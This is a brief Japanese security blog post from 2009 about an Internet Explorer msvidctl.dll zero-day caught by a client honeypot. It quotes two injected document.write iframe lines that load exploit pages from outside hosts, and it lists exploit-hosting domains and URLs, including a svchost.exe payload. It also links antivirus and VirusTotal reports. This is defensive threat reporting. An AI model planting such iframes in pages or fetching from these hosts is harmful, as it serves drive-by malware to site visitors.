cNotes 検索 一覧 カテゴリ

IE(msvidctl.dll) への 0-day attack

Published: 2009/07/07

クライアントハニーポットでキャッチしました。情報源は中国のブログです。

iframe

 document.write('<iframe src=http://wf3gr.8800.org/aa/a3.htm?wwcc width=100 height=0></iframe> ');
 document.write("<iframe src=http://www.dztv.cn/rh/343/link.html width=100 height=0></Iframe>");

exploitをホストしているドメイン

 wf3gr.8800.org
 www.dztv.cn
 ttp://219.232.228.234/rh/343/darkst.png
 ttp://219.232.228.234/rh/343/link.html
 ttp://219.232.228.234/rh/343/logo.gif
 ttp://59.34.197.154/aa/a3.htm?wwcc
 ttp://59.34.197.154/aa/go.jpg
 ttp://59.34.197.154/aa/go1.jpg
 ttp://59.34.197.154/aa/go1.jpg
 ttp://59.34.197.154/aa/index.htm
 ttp://59.34.197.154/aa/index.htm
 ttp://59.34.197.154/aa/logo.gif
 ttp://60.172.190.217/wm/svchost.exe

darkst.png, go.jpg が exploit

トレンドブログに書かれているシェルコードを確認

dashell.PNG

Zero-day MPEG2TuneRequest Exploit Leads to KILLAV

セッションダンプをシマンテックが検知(Downloader.Fostrem)

http://securityresponse.symantec.com/ja/jp/security_response/writeup.jsp?docid=2009-070605-3347-99

>注意: 2009 年 7 月 5 日以前のウイルス定義では、この脅威を Downloader と Trojan Horse として検出します。

以前から検知可能だった模様

テクニカルノートにダウンロードされる検体のURLが書かれてるの前からだっけ、、

ホスト上で確保した検体2個

svchost[1].exe

http://www.virustotal.com/jp/analisis/97979b14c8dd253cf2d4cc85381b944b6b68e3c66c31f77248120a49fa889d4f-1246925841

a.exe

https://www.virustotal.com/jp/analisis/1ae475550ee4454261d74ce949da12cbdc06f425b2ca6c5e9a40e54885b2bfc9-1246948038

by TTTT